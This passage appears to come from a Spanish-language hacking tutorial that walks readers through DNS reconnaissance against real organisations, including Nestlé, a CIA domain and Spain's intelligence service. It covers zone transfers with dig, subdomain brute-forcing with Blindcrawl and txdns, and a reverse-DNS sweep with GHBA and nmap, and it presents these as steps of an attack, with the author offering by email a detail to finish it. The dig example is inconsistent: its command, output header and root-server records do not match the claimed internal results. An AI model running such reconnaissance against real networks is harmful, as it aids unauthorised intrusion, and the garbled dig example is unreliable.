Como véis, hemos conseguido saber que el servidor DNS primario es eurdns1.nestle.com y los otros tres (ctrdns1.nestle.com, amsdns1.nestle.com, aoadns1.nestle.com) son los secundarios. Ahora vamos a aprovechar esto y probemos suerte. Sabemos cual es el servidor primario, así que vamos a ver si realizando una transferencia de zona podemos obtener datos internos de la red. Para esta operación utilizaremos "dig", que viene disponible en todos los sistemas UNIX. Si no dispones de un sistema operativo GNU/Linux, te animo a que lo pruebes, pues las posibilidades que ofrecen son muy amplias. Si de momento no tienes en mente instalarlo no te preocupes, puedes utilizar dig en Windows. En la columna izquierda hay un link que te remite a una página en la que te lo explica. Bueno, veamos el comando:

$ dig @relay2.ucia.gov ucia.gov axfr

; <<>> DiG 9.5.0-P2 <<>> @eurdns1.nestle.com @ctrdns1.nestle.com axfr
; (1 server found)
;; global options: printcmd
. 57364 IN NS g.root-servers.net.
. 57364 IN NS l.root-servers.net.
. 57364 IN NS k.root-servers.net.
. 57364 IN NS i.root-servers.net.
. 57364 IN NS m.root-servers.net.
. 57364 IN NS b.root-servers.net.
. 57364 IN NS f.root-servers.net.
. 57364 IN NS j.root-servers.net.
. 57364 IN NS a.root-servers.net.
. 57364 IN NS e.root-servers.net.
. 57364 IN NS c.root-servers.net.
. 57364 IN NS d.root-servers.net.
. 57364 IN NS h.root-servers.net.
g.root-servers.net. 33362 IN A 192.112.36.4
l.root-servers.net. 33363 IN A 199.7.83.42
k.root-servers.net. 57364 IN A 193.0.14.129
i.root-servers.net. 33362 IN A 192.36.148.17
m.root-servers.net. 33363 IN A 202.12.27.33
b.root-servers.net. 33363 IN A 192.228.79.201
f.root-servers.net. 33362 IN A 192.5.5.241
j.root-servers.net. 57364 IN A 192.58.128.30
a.root-servers.net. 33363 IN A 198.41.0.4
e.root-servers.net. 33362 IN A 192.203.230.10
c.root-servers.net. 33363 IN A 192.33.4.12
d.root-servers.net. 33363 IN A 128.8.10.90
h.root-servers.net. 33362 IN A 128.63.2.53
;; Query time: 53 msec
;; SERVER: 160.213.122.244#53(160.213.122.244)
;; WHEN: Thu Dec 18 01:05:15 2008
;; MSG SIZE rcvd: 449

Hemos realizado una transferencia de zona y hemos conseguido con éxito direcciones locales internas de la red con sus respectivos nombres. Para obtener una mayor información es conveniente que se realice esta operación con todos aquellos servidores DNS secundarios. Cuidado con esto porque hasta los de la CIA no lo tienen bien controlado. Si queréis podéis probar esta técnica y si os véis con problemas me avisáis al mail que os daré un dato clave para finiquitar el ataque.

REDIRECCIÓN DNS GRINDING:

Puede darse el caso de que un dominio no lleve a cabo transferencias de zona. En este caso hay que llevar a cabo un ataque grinding para enumerar registros y alias relacionados con el dominio y servidores del dominio. Para hacer esto disponemos de dos herramientas que las podéis descargar del menú de la derecha: Txdns (http://www.txdns.net) y Blindcrawl.pl (http://sec.angrypacket.com). Estas herramientas lo que harán será probar diferentes nombres de dominio hasta dar con el correcto. Podéis descargarlas del menú de la derecha. Las dos soportan el uso de un diccionario aunque lo bueno de Blindcrawl es que permite probar sin diccionario aunque las posibilidades que ofrece no son muy amplias pero si funcionales.

Con Txdns el ataque DNS grinding se realizaría así:


> txdns -f diccionario.txt dominio.com

Con Blindcrawl sería de la siguiente manera:

$ perl Blindcrawl.pl -i diccionario.txt -d dominio.com # Con diccionario.

$ perl Blindcrawl.pl -d dominio.com # Sin diccionario.

En la página de txdns tienes dos diccionarios para descargar. También podéis visualizarlos en esta misma web, accediendo desde el menú de la derecha. Veamos a continuación un ataque realizado a nestle.es para enumerar servidores con Blindcrawl:

$ perl blindcrawl.pl -d nestle.es

** blindcrawl.pl v0.9.0b9 by dmuz @ AngryPacket Security **

www.nestle.es:213.225.147.144
mail.nestle.es:194.30.112.4
staging.nestle.es:213.225.139.118

3 common cname lookups were successful on nestle.es

--------------------------------------
TOTAL SUCCESSES: 3
--------------------------------------

Hemos conseguido 3 nombres de servidores con sus respectivas ip's. Si con cada uno de estos nombres aplicamos lo anteriormente explicado y a esto sumamos rastreos WHOIS, obtendremos mucha información sobre la red objetivo.

BARRIDO INVERSO DE DNS:

Una vez hemos obtenido una lista de ip's, podemos realizar un barrido inverso de DNS para obtener información de equipos filtrados o protegidos. Para ello podemos utilizar GHBA y Nmap. Instalar Nmap es muy fácil tanto en Windows como en Linux. Si no sabes como hacerlo encontrarás muchas guías en Google. Para los que no sepáis compilar un archivo en C: si estáis en Windows, descargaros un compilador, como por ejemplo dev-c++, si por el contrario estáis en Linux; descargaos gcc (en sistemas basados en debian lo podéis hacer mediante el comando "sudo apt-get install gcc") y para compilarlo utilizad este comando "gcc ghba.c -o ghba". Vamos a probar GHBA y luego Nmap y esta vez con en CNI :

Resultados GHBA:

$ ./ghba 213.0.41.0
Scanning Class C network 213.0.41...
213.0.41.1 => 213-0-41-001.rad.tsai.es
213.0.41.2 => 213-0-41-002.rad.tsai.es
213.0.41.3 => 213-0-41-003.rad.tsai.es
213.0.41.4 => 213-0-41-004.rad.tsai.es
213.0.41.5 => 213-0-41-005.rad.tsai.es
213.0.41.6 => 213-0-41-006.rad.tsai.es
213.0.41.7 => 213-0-41-007.rad.tsai.es
213.0.41.8 => 213-0-41-008.rad.tsai.es
213.0.41.9 => 213-0-41-009.rad.tsai.es
213.0.41.10 => 213-0-41-010.rad.tsai.es
213.0.41.11 => 213-0-41-011.rad.tsai.es
213.0.41.12 => 213-0-41-012.rad.tsai.es
213.0.41.13 => 213-0-41-013.rad.tsai.es
213.0.41.14 => 213-0-41-014.rad.tsai.es
213.0.41.15 => 213-0-41-015.rad.tsai.es
213.0.41.16 => 213-0-41-016.rad.tsai.es
213.0.41.17 => 213-0-41-017.rad.tsai.es
213.0.41.18 => 213-0-41-018.rad.tsai.es
213.0.41.19 => 213-0-41-019.rad.tsai.es
213.0.41.20 => 213-0-41-020.rad.tsai.es
213.0.41.21 => 213-0-41-021.rad.tsai.es
213.0.41.22 => 213-0-41-022.rad.tsai.es
213.0.41.23 => 213-0-41-023.rad.tsai.es
213.0.41.24 => 213-0-41-024.rad.tsai.es
213.0.41.25 => 213-0-41-025.rad.tsai.es
213.0.41.26 => 213-0-41-026.rad.tsai.es
213.0.41.27 => 213-0-41-027.rad.tsai.es
213.0.41.28 => 213-0-41-028.rad.tsai.es
213.0.41.29 => 213-0-41-029.rad.tsai.es
213.0.41.30 => 213-0-41-030.rad.tsai.es
213.0.41.31 => 213-0-41-031.rad.tsai.es
213.0.41.32 => 213-0-41-032.rad.tsai.es
213.0.41.33 => 213-0-41-033.rad.tsai.es
213.0.41.34 => 213-0-41-034.rad.tsai.es
213.0.41.35 => 213-0-41-035.rad.tsai.es
213.0.41.36 => 213-0-41-036.rad.tsai.es
213.0.41.37 => 213-0-41-037.rad.tsai.es
213.0.41.38 => 213-0-41-038.rad.tsai.es
213.0.41.39 => 213-0-41-039.rad.tsai.es
213.0.41.40 => 213-0-41-040.rad.tsai.es
213.0.41.41 => 213-0-41-041.rad.tsai.es
213.0.41.42 => 213-0-41-042.rad.tsai.es
213.0.41.43 => 213-0-41-043.rad.tsai.es
213.0.41.44 => 213-0-41-044.rad.tsai.es
213.0.41.45 => 213-0-41-045.rad.tsai.es
213.0.41.46 => 213-0-41-046.rad.tsai.es
213.0.41.47 => 213-0-41-047.rad.tsai.es
213.0.41.48 => 213-0-41-048.rad.tsai.es
213.0.41.49 => 213-0-41-049.rad.tsai.es
213.0.41.50 => 213-0-41-050.rad.tsai.es
213.0.41.51 => 213-0-41-051.rad.tsai.es
213.0.41.52 => 213-0-41-052.rad.tsai.es
213.0.41.53 => 213-0-41-053.rad.tsai.es
213.0.41.54 => 213-0-41-054.rad.tsai.es
213.0.41.55 => 213-0-41-055.rad.tsai.es
213.0.41.56 => 213-0-41-056.rad.tsai.es
213.0.41.57 => 213-0-41-057.rad.tsai.es
213.0.41.58 => 213-0-41-058.rad.tsai.es
213.0.41.59 => 213-0-41-059.rad.tsai.es
213.0.41.60 => 213-0-41-060.rad.tsai.es
213.0.41.61 => 213-0-41-061.rad.tsai.es
213.0.41.62 => 213-0-41-062.rad.tsai.es
213.0.41.63 => 213-0-41-063.rad.tsai.es
213.0.41.64 => 213-0-41-064.rad.tsai.es
213.0.41.65 => 213-0-41-065.rad.tsai.es
213.0.41.66 => 213-0-41-066.rad.tsai.es
213.0.41.67 => 213-0-41-067.rad.tsai.es
213.0.41.68 => 213-0-41-068.rad.tsai.es
213.0.41.69 => 213-0-41-069.rad.tsai.es
213.0.41.70 => 213-0-41-070.rad.tsai.es
213.0.41.71 => 213-0-41-071.rad.tsai.es
213.0.41.72 => 213-0-41-072.rad.tsai.es
213.0.41.73 => 213-0-41-073.rad.tsai.es
213.0.41.74 => 213-0-41-074.rad.tsai.es
213.0.41.75 => 213-0-41-075.rad.tsai.es
213.0.41.76 => 213-0-41-076.rad.tsai.es
213.0.41.77 => 213-0-41-077.rad.tsai.es
213.0.41.78 => 213-0-41-078.rad.tsai.es
213.0.41.79 => 213-0-41-079.rad.tsai.es
213.0.41.80 => 213-0-41-080.rad.tsai.es
213.0.41.81 => 213-0-41-081.rad.tsai.es
213.0.41.82 => 213-0-41-082.rad.tsai.es
213.0.41.83 => 213-0-41-083.rad.tsai.es
213.0.41.84 => 213-0-41-084.rad.tsai.es
213.0.41.85 => 213-0-41-085.rad.tsai.es
213.0.41.86 => 213-0-41-086.rad.tsai.es
213.0.41.87 => 213-0-41-087.rad.tsai.es
213.0.41.88 => 213-0-41-088.rad.tsai.es
213.0.41.89 => 213-0-41-089.rad.tsai.es
213.0.41.90 => 213-0-41-090.rad.tsai.es
213.0.41.91 => 213-0-41-091.rad.tsai.es
213.0.41.92 => 213-0-41-092.rad.tsai.es
213.0.41.93 => 213-0-41-093.rad.tsai.es
213.0.41.94 => 213-0-41-094.rad.tsai.es
213.0.41.95 => 213-0-41-095.rad.tsai.es
213.0.41.96 => 213-0-41-096.rad.tsai.es
213.0.41.97 => 213-0-41-097.rad.tsai.es
213.0.41.98 => 213-0-41-098.rad.tsai.es
213.0.41.99 => 213-0-41-099.rad.tsai.es
213.0.41.100 => 213-0-41-100.rad.tsai.es
213.0.41.101 => 213-0-41-101.rad.tsai.es
213.0.41.102 => 213-0-41-102.rad.tsai.es
213.0.41.103 => 213-0-41-103.rad.tsai.es
213.0.41.104 => 213-0-41-104.rad.tsai.es
213.0.41.105 => 213-0-41-105.rad.tsai.es
213.0.41.106 => mail.campofrio.es
213.0.41.107 => 213-0-41-107.rad.tsai.es
213.0.41.108 => 213-0-41-108.rad.tsai.es
213.0.41.109 => 213-0-41-109.rad.tsai.es
213.0.41.110 => 213-0-41-110.rad.tsai.es
213.0.41.111 => 213-0-41-111.rad.tsai.es
213.0.41.112 => 213-0-41-112.rad.tsai.es
213.0.41.113 => 213-0-41-113.rad.tsai.es
213.0.41.114 => 213-0-41-114.rad.tsai.es
213.0.41.115 => 213-0-41-115.rad.tsai.es
213.0.41.116 => 213-0-41-116.rad.tsai.es
213.0.41.117 => 213-0-41-117.rad.tsai.es
213.0.41.118 => 213-0-41-118.rad.tsai.es
213.0.41.119 => 213-0-41-119.rad.tsai.es
213.0.41.120 => 213-0-41-120.rad.tsai.es
213.0.41.121 => 213-0-41-121.rad.tsai.es
213.0.41.122 => 213-0-41-122.rad.tsai.es
213.0.41.123 => 213-0-41-123.rad.tsai.es
213.0.41.124 => 213-0-41-124.rad.tsai.es
213.0.41.125 => 213-0-41-125.rad.tsai.es
213.0.41.126 => 213-0-41-126.rad.tsai.es
213.0.41.127 => 213-0-41-127.rad.tsai.es
213.0.41.128 => 213-0-41-128.rad.tsai.es
213.0.41.129 => 213-0-41-129.rad.tsai.es
213.0.41.130 => 213-0-41-130.rad.tsai.es
213.0.41.131 => 213-0-41-131.rad.tsai.es
213.0.41.132 => 213-0-41-132.rad.tsai.es
213.0.41.133 => 213-0-41-133.rad.tsai.es
213.0.41.134 => 213-0-41-134.rad.tsai.es
213.0.41.135 => 213-0-41-135.rad.tsai.es
213.0.41.136 => 213-0-41-136.rad.tsai.es
213.0.41.137 => 213-0-41-137.rad.tsai.es
213.0.41.138 => 213-0-41-138.rad.tsai.es
213.0.41.139 => 213-0-41-139.rad.tsai.es
213.0.41.140 => 213-0-41-140.rad.tsai.es
213.0.41.141 => 213-0-41-141.rad.tsai.es
213.0.41.142 => 213-0-41-142.rad.tsai.es
213.0.41.143 => 213-0-41-143.rad.tsai.es
213.0.41.144 => 213-0-41-144.rad.tsai.es
213.0.41.145 => 213-0-41-145.rad.tsai.es
213.0.41.146 => 213-0-41-146.rad.tsai.es
213.0.41.147 => 213-0-41-147.rad.tsai.es
213.0.41.148 => 213-0-41-148.rad.tsai.es
213.0.41.149 => 213-0-41-149.rad.tsai.es
213.0.41.150 => 213-0-41-150.rad.tsai.es
213.0.41.151 => 213-0-41-151.rad.tsai.es
213.0.41.152 => 213-0-41-152.rad.tsai.es
213.0.41.153 => 213-0-41-153.rad.tsai.es
213.0.41.154 => 213-0-41-154.rad.tsai.es
213.0.41.155 => 213-0-41-155.rad.tsai.es
213.0.41.156 => 213-0-41-156.rad.tsai.es
213.0.41.157 => 213-0-41-157.rad.tsai.es
213.0.41.158 => 213-0-41-158.rad.tsai.es
213.0.41.159 => 213-0-41-159.rad.tsai.es
213.0.41.160 => 213-0-41-160.rad.tsai.es
213.0.41.161 => 213-0-41-161.rad.tsai.es
213.0.41.162 => raceavas1.race.es
213.0.41.163 => raceavas2.race.es
213.0.41.164 => 213-0-41-164.rad.tsai.es
213.0.41.165 => 213-0-41-165.rad.tsai.es
213.0.41.166 => 213-0-41-166.rad.tsai.es
213.0.41.167 => 213-0-41-167.rad.tsai.es
213.0.41.168 => smtp.race.es
213.0.41.169 => 213-0-41-169.rad.tsai.es
213.0.41.170 => 213-0-41-170.rad.tsai.es
213.0.41.171 => 213-0-41-171.rad.tsai.es
213.0.41.172 => 213-0-41-172.rad.tsai.es
213.0.41.173 => 213-0-41-173.rad.tsai.es
213.0.41.174 => 213-0-41-174.rad.tsai.es
213.0.41.175 => 213-0-41-175.rad.tsai.es
213.0.41.176 => 213-0-41-176.rad.tsai.es
213.0.41.177 => 213-0-41-177.rad.tsai.es
213.0.41.178 => www.cni.es
213.0.41.179 => 213-0-41-179.rad.tsai.es
213.0.41.180 => 213-0-41-180.rad.tsai.es
213.0.41.181 => 213-0-41-181.rad.tsai.es
213.0.41.182 => 213-0-41-182.rad.tsai.es
213.0.41.183 => 213-0-41-183.rad.tsai.es
213.0.41.184 => 213-0-41-184.rad.tsai.es
213.0.41.185 => 213-0-41-185.rad.tsai.es
213.0.41.186 => 213-0-41-186.rad.tsai.es
213.0.41.187 => 213-0-41-187.rad.tsai.es
213.0.41.188 => 213-0-41-188.rad.tsai.es
213.0.41.189 => 213-0-41-189.rad.tsai.es
213.0.41.190 => 213-0-41-190.rad.tsai.es
213.0.41.191 => 213-0-41-191.rad.tsai.es
213.0.41.192 => 213-0-41-192.rad.tsai.es
213.0.41.193 => 213-0-41-193.rad.tsai.es
213.0.41.194 => 213-0-41-194.rad.tsai.es
213.0.41.195 => 213-0-41-195.rad.tsai.es
213.0.41.196 => 213-0-41-196.rad.tsai.es
213.0.41.197 => 213-0-41-197.rad.tsai.es
213.0.41.198 => 213-0-41-198.rad.tsai.es
213.0.41.199 => 213-0-41-199.rad.tsai.es
213.0.41.200 => 213-0-41-200.rad.tsai.es
213.0.41.201 => 213-0-41-201.rad.tsai.es
213.0.41.202 => 213-0-41-202.rad.tsai.es
213.0.41.203 => 213-0-41-203.rad.tsai.es
213.0.41.204 => 213-0-41-204.rad.tsai.es
213.0.41.205 => 213-0-41-205.rad.tsai.es
213.0.41.206 => 213-0-41-206.rad.tsai.es
213.0.41.207 => 213-0-41-207.rad.tsai.es
213.0.41.208 => 213-0-41-208.rad.tsai.es
213.0.41.209 => 213-0-41-209.rad.tsai.es
213.0.41.210 => correo.aifos.com
213.0.41.211 => 213-0-41-211.rad.tsai.es
213.0.41.212 => 213-0-41-212.rad.tsai.es
213.0.41.213 => 213-0-41-213.rad.tsai.es
213.0.41.214 => 213-0-41-214.rad.tsai.es
213.0.41.215 => 213-0-41-215.rad.tsai.es
213.0.41.216 => 213-0-41-216.rad.tsai.es
213.0.41.217 => 213-0-41-217.rad.tsai.es
213.0.41.218 => 213-0-41-218.rad.tsai.es
213.0.41.219 => 213-0-41-219.rad.tsai.es
213.0.41.220 => 213-0-41-220.rad.tsai.es
213.0.41.221 => 213-0-41-221.rad.tsai.es
213.0.41.222 => 213-0-41-222.rad.tsai.es
213.0.41.223 => 213-0-41-223.rad.tsai.es
213.0.41.224 => 213-0-41-224.rad.tsai.es
213.0.41.225 => 213-0-41-225.rad.tsai.es
213.0.41.226 => 213-0-41-226.rad.tsai.es
213.0.41.227 => 213-0-41-227.rad.tsai.es
213.0.41.228 => 213-0-41-228.rad.tsai.es
213.0.41.229 => 213-0-41-229.rad.tsai.es
213.0.41.230 => 213-0-41-230.rad.tsai.es
213.0.41.231 => 213-0-41-231.rad.tsai.es
213.0.41.232 => 213-0-41-232.rad.tsai.es
213.0.41.233 => 213-0-41-233.rad.tsai.es
213.0.41.234 => 213-0-41-234.rad.tsai.es
213.0.41.235 => 213-0-41-235.rad.tsai.es
213.0.41.236 => 213-0-41-236.rad.tsai.es
213.0.41.237 => 213-0-41-237.rad.tsai.es
213.0.41.238 => 213-0-41-238.rad.tsai.es
213.0.41.239 => 213-0-41-239.rad.tsai.es
213.0.41.240 => 213-0-41-240.rad.tsai.es
213.0.41.241 => 213-0-41-241.rad.tsai.es
213.0.41.242 => 213-0-41-242.rad.tsai.es
213.0.41.243 => 213-0-41-243.rad.tsai.es
213.0.41.244 => 213-0-41-244.rad.tsai.es
213.0.41.245 => 213-0-41-245.rad.tsai.es
213.0.41.246 => 213-0-41-246.rad.tsai.es
213.0.41.247 => 213-0-41-247.rad.tsai.es
213.0.41.248 => 213-0-41-248.rad.tsai.es
213.0.41.249 => 213-0-41-249.rad.tsai.es
213.0.41.250 => 213-0-41-250.rad.tsai.es
213.0.41.251 => 213-0-41-251.rad.tsai.es
213.0.41.252 => 213-0-41-252.rad.tsai.es
213.0.41.253 => 213-0-41-253.rad.tsai.es
213.0.41.254 => 213-0-41-254.rad.tsai.es

Resultados Nmap:

$ nmap -sL 213.0.41.0/24

Starting Nmap 4.62 ( http://nmap.org ) at 2008-12-18 18:12 CET
Host 213.0.41.0 not scanned
Host 213-0-41-001.rad.tsai.es (213.0.41.1) not scanned
Host 213-0-41-002.rad.tsai.es (213.0.41.2) not scanned
Host 213-0-41-003.rad.tsai.es (213.0.41.3) not scanned
Host 213-0-41-004.rad.tsai.es (213.0.41.4) not scanned
Host 213-0-41-005.rad.tsai.es (213.0.41.5) not scanned
Host 213-0-41-006.rad.tsai.es (213.0.41.6) not scanned
Host 213-0-41-007.rad.tsai.es (213.0.41.7) not scanned
Host 213-0-41-008.rad.tsai.es (213.0.41.8) not scanned
Host 213-0-41-009.rad.tsai.es (213.0.41.9) not scanned
Host 213-0-41-010.rad.tsai.es (213.0.41.10) not scanned
Host 213-0-41-011.rad.tsai.es (213.0.41.11) not scanned
Host 213-0-41-012.rad.tsai.es (213.0.41.12) not scanned
Host 213-0-41-013.rad.tsai.es (213.0.41.13) not scanned
Host 213-0-41-014.rad.tsai.es (213.0.41.14) not scanned
Host 213-0-41-015.rad.tsai.es (213.0.41.15) not scanned
Host 213-0-41-016.rad.tsai.es (213.0.41.16) not scanned
Host 213-0-41-017.rad.tsai.es (213.0.41.17) not scanned
Host 213-0-41-018.rad.tsai.es (213.0.41.18) not scanned
Host 213.0.41.19 not scanned
Host 213.0.41.20 not scanned
Host 213-0-41-021.rad.tsai.es (213.0.41.21) not scanned
Host 213-0-41-022.rad.tsai.es (213.0.41.22) not scanned
Host 213.0.41.23 not scanned
Host 213.0.41.24 not scanned
Host 213-0-41-025.rad.tsai.es (213.0.41.25) not scanned
Host 213-0-41-026.rad.tsai.es (213.0.41.26) not scanned
Host 213-0-41-027.rad.tsai.es (213.0.41.27) not scanned
Host 213.0.41.28 not scanned
Host 213-0-41-029.rad.tsai.es (213.0.41.29) not scanned
Host 213-0-41-030.rad.tsai.es (213.0.41.30) not scanned
Host 213-0-41-031.rad.tsai.es (213.0.41.31) not scanned
Host 213-0-41-032.rad.tsai.es (213.0.41.32) not scanned
Host 213-0-41-033.rad.tsai.es (213.0.41.33) not scanned
Host 213-0-41-034.rad.tsai.es (213.0.41.34) not scanned
Host 213-0-41-035.rad.tsai.es (213.0.41.35) not scanned
Host 213-0-41-036.rad.tsai.es (213.0.41.36) not scanned
Host 213-0-41-037.rad.tsai.es (213.0.41.37) not scanned
Host 213-0-41-038.rad.tsai.es (213.0.41.38) not scanned
Host 213-0-41-039.rad.tsai.es (213.0.41.39) not scanned
Host 213-0-41-040.rad.tsai.es (213.0.41.40) not scanned
Host 213-0-41-041.rad.tsai.es (213.0.41.41) not scanned
Host 213.0.41.42 not scanned
Host 213-0-41-043.rad.tsai.es (213.0.41.43) not scanned
Host 213-0-41-044.rad.tsai.es (213.0.41.44) not scanned
Host 213-0-41-045.rad.tsai.es (213.0.41.45) not scanned
Host 213-0-41-046.rad.tsai.es (213.0.41.46) not scanned
Host 213.0.41.47 not scanned
Host 213-0-41-048.rad.tsai.es (213.0.41.48) not scanned
Host 213-0-41-049.rad.tsai.es (213.0.41.49) not scanned
Host 213-0-41-050.rad.tsai.es (213.0.41.50) not scanned
Host 213-0-41-051.rad.tsai.es (213.0.41.51) not scanned
Host 213-0-41-052.rad.tsai.es (213.0.41.52) not scanned
Host 213-0-41-053.rad.tsai.es (213.0.41.53) not scanned
Host 213-0-41-054.rad.tsai.es (213.0.41.54) not scanned
Host 213.0.41.55 not scanned
Host 213-0-41-056.rad.tsai.es (213.0.41.56) not scanned
Host 213-0-41-057.rad.tsai.es (213.0.41.57) not scanned
Host 213-0-41-058.rad.tsai.es (213.0.41.58) not scanned
Host 213-0-41-059.rad.tsai.es (213.0.41.59) not scanned
Host 213-0-41-060.rad.tsai.es (213.0.41.60) not scanned
Host 213-0-41-061.rad.tsai.es (213.0.41.61) not scanned
Host 213-0-41-062.rad.tsai.es (213.0.41.62) not scanned
Host 213-0-41-063.rad.tsai.es (213.0.41.63) not scanned
Host 213-0-41-064.rad.tsai.es (213.0.41.64) not scanned
Host 213-0-41-065.rad.tsai.es (213.0.41.65) not scanned
Host 213-0-41-066.rad.tsai.es (213.0.41.66) not scanned
Host 213.0.41.67 not scanned
Host 213-0-41-068.rad.tsai.es (213.0.41.68) not scanned
Host 213-0-41-069.rad.tsai.es (213.0.41.69) not scanned
Host 213-0-41-070.rad.tsai.es (213.0.41.70) not scanned
Host 213-0-41-071.rad.tsai.es (213.0.41.71) not scanned
Host 213-0-41-072.rad.tsai.es (213.0.41.72) not scanned
Host 213-0-41-073.rad.tsai.es (213.0.41.73) not scanned
Host 213-0-41-074.rad.tsai.es (213.0.41.74) not scanned
Host 213.0.41.75 not scanned
Host 213.0.41.76 not scanned
Host 213-0-41-077.rad.tsai.es (213.0.41.77) not scanned
Host 213-0-41-078.rad.tsai.es (213.0.41.78) not scanned
Host 213-0-41-079.rad.tsai.es (213.0.41.79) not scanned
Host 213-0-41-080.rad.tsai.es (213.0.41.80) not scanned
Host 213-0-41-081.rad.tsai.es (213.0.41.81) not scanned
Host 213-0-41-082.rad.tsai.es (213.0.41.82) not scanned
Host 213-0-41-083.rad.tsai.es (213.0.41.83) not scanned
Host 213-0-41-084.rad.tsai.es (213.0.41.84) not scanned
Host 213-0-41-085.rad.tsai.es (213.0.41.85) not scanned
Host 213-0-41-086.rad.tsai.es (213.0.41.86) not scanned
Host 213.0.41.87 not scanned
Host 213.0.41.88 not scanned
Host 213.0.41.89 not scanned
Host 213-0-41-090.rad.tsai.es (213.0.41.90) not scanned
Host 213.0.41.91 not scanned
Host 213.0.41.92 not scanned
Host 213.0.41.93 not scanned
Host 213-0-41-094.rad.tsai.es (213.0.41.94) not scanned
Host 213-0-41-095.rad.tsai.es (213.0.41.95) not scanned
Host 213-0-41-096.rad.tsai.es (213.0.41.96) not scanned
Host 213-0-41-097.rad.tsai.es (213.0.41.97) not scanned
Host 213.0.41.98 not scanned
Host 213.0.41.99 not scanned
Host 213-0-41-100.rad.tsai.es (213.0.41.100) not scanned
Host 213-0-41-101.rad.tsai.es (213.0.41.101) not scanned
Host 213-0-41-102.rad.tsai.es (213.0.41.102) not scanned
Host 213-0-41-103.rad.tsai.es (213.0.41.103) not scanned
Host 213-0-41-104.rad.tsai.es (213.0.41.104) not scanned
Host 213-0-41-105.rad.tsai.es (213.0.41.105) not scanned
Host mail.campofrio.es (213.0.41.106) not scanned
Host 213.0.41.107 not scanned
Host 213-0-41-108.rad.tsai.es (213.0.41.108) not scanned
Host 213-0-41-109.rad.tsai.es (213.0.41.109) not scanned
Host 213-0-41-110.rad.tsai.es (213.0.41.110) not scanned
Host 213-0-41-111.rad.tsai.es (213.0.41.111) not scanned
Host 213-0-41-112.rad.tsai.es (213.0.41.112) not scanned
Host 213-0-41-113.rad.tsai.es (213.0.41.113) not scanned
Host 213-0-41-114.rad.tsai.es (213.0.41.114) not scanned
Host 213-0-41-115.rad.tsai.es (213.0.41.115) not scanned
Host 213-0-41-116.rad.tsai.es (213.0.41.116) not scanned
Host 213-0-41-117.rad.tsai.es (213.0.41.117) not scanned
Host 213-0-41-118.rad.tsai.es (213.0.41.118) not scanned
Host 213-0-41-119.rad.tsai.es (213.0.41.119) not scanned
Host 213.0.41.120 not scanned
Host 213.0.41.121 not scanned
Host 213.0.41.122 not scanned
Host 213-0-41-123.rad.tsai.es (213.0.41.123) not scanned
Host 213-0-41-124.rad.tsai.es (213.0.41.124) not scanned
Host 213-0-41-125.rad.tsai.es (213.0.41.125) not scanned
Host 213-0-41-126.rad.tsai.es (213.0.41.126) not scanned
Host 213-0-41-127.rad.tsai.es (213.0.41.127) not scanned
Host 213.0.41.128 not scanned
Host 213-0-41-129.rad.tsai.es (213.0.41.129) not scanned
Host 213-0-41-130.rad.tsai.es (213.0.41.130) not scanned
Host 213.0.41.131 not scanned
Host 213-0-41-132.rad.tsai.es (213.0.41.132) not scanned
Host 213-0-41-133.rad.tsai.es (213.0.41.133) not scanned
Host 213-0-41-134.rad.tsai.es (213.0.41.134) not scanned
Host 213-0-41-135.rad.tsai.es (213.0.41.135) not scanned
Host 213.0.41.136 not scanned
Host 213.0.41.137 not scanned
Host 213.0.41.138 not scanned
Host 213-0-41-139.rad.tsai.es (213.0.41.139) not scanned
Host 213-0-41-140.rad.tsai.es (213.0.41.140) not scanned
Host 213-0-41-141.rad.tsai.es (213.0.41.141) not scanned
Host 213-0-41-142.rad.tsai.es (213.0.41.142) not scanned
Host 213-0-41-143.rad.tsai.es (213.0.41.143) not scanned
Host 213-0-41-144.rad.tsai.es (213.0.41.144) not scanned
Host 213-0-41-145.rad.tsai.es (213.0.41.145) not scanned
Host 213-0-41-146.rad.tsai.es (213.0.41.146) not scanned
Host 213.0.41.147 not scanned
Host 213.0.41.148 not scanned
Host 213.0.41.149 not scanned
Host 213-0-41-150.rad.tsai.es (213.0.41.150) not scanned
Host 213-0-41-151.rad.tsai.es (213.0.41.151) not scanned
Host 213-0-41-152.rad.tsai.es (213.0.41.152) not scanned
Host 213.0.41.153 not scanned
Host 213-0-41-154.rad.tsai.es (213.0.41.154) not scanned
Host 213.0.41.155 not scanned
Host 213.0.41.156 not scanned
Host 213-0-41-157.rad.tsai.es (213.0.41.157) not scanned
Host 213-0-41-158.rad.tsai.es (213.0.41.158) not scanned
Host 213-0-41-159.rad.tsai.es (213.0.41.159) not scanned
Host 213-0-41-160.rad.tsai.es (213.0.41.160) not scanned
Host 213-0-41-161.rad.tsai.es (213.0.41.161) not scanned
Host raceavas1.race.es (213.0.41.162) not scanned
Host 213.0.41.163 not scanned
Host 213.0.41.164 not scanned
Host 213-0-41-165.rad.tsai.es (213.0.41.165) not scanned
Host 213-0-41-166.rad.tsai.es (213.0.41.166) not scanned
Host 213-0-41-167.rad.tsai.es (213.0.41.167) not scanned
Host smtp.race.es (213.0.41.168) not scanned
Host 213-0-41-169.rad.tsai.es (213.0.41.169) not scanned
Host 213-0-41-170.rad.tsai.es (213.0.41.170) not scanned
Host 213-0-41-171.rad.tsai.es (213.0.41.171) not scanned
Host 213-0-41-172.rad.tsai.es (213.0.41.172) not scanned
Host 213.0.41.173 not scanned
Host 213-0-41-174.rad.tsai.es (213.0.41.174) not scanned
Host 213-0-41-175.rad.tsai.es (213.0.41.175) not scanned
Host 213-0-41-176.rad.tsai.es (213.0.41.176) not scanned
Host 213-0-41-177.rad.tsai.es (213.0.41.177) not scanned
Host www.cni.es (213.0.41.178) not scanned
Host 213-0-41-179.rad.tsai.es (213.0.41.179) not scanned
Host 213.0.41.180 not scanned
Host 213-0-41-181.rad.tsai.es (213.0.41.181) not scanned
Host 213-0-41-182.rad.tsai.es (213.0.41.182) not scanned
Host 213-0-41-183.rad.tsai.es (213.0.41.183) not scanned
Host 213-0-41-184.rad.tsai.es (213.0.41.184) not scanned
Host 213-0-41-185.rad.tsai.es (213.0.41.185) not scanned
Host 213.0.41.186 not scanned
Host 213-0-41-187.rad.tsai.es (213.0.41.187) not scanned
Host 213.0.41.188 not scanned
Host 213.0.41.189 not scanned
Host 213.0.41.190 not scanned
Host 213.0.41.191 not scanned
Host 213-0-41-192.rad.tsai.es (213.0.41.192) not scanned
Host 213-0-41-193.rad.tsai.es (213.0.41.193) not scanned
Host 213-0-41-194.rad.tsai.es (213.0.41.194) not scanned
Host 213-0-41-195.rad.tsai.es (213.0.41.195) not scanned
Host 213-0-41-196.rad.tsai.es (213.0.41.196) not scanned
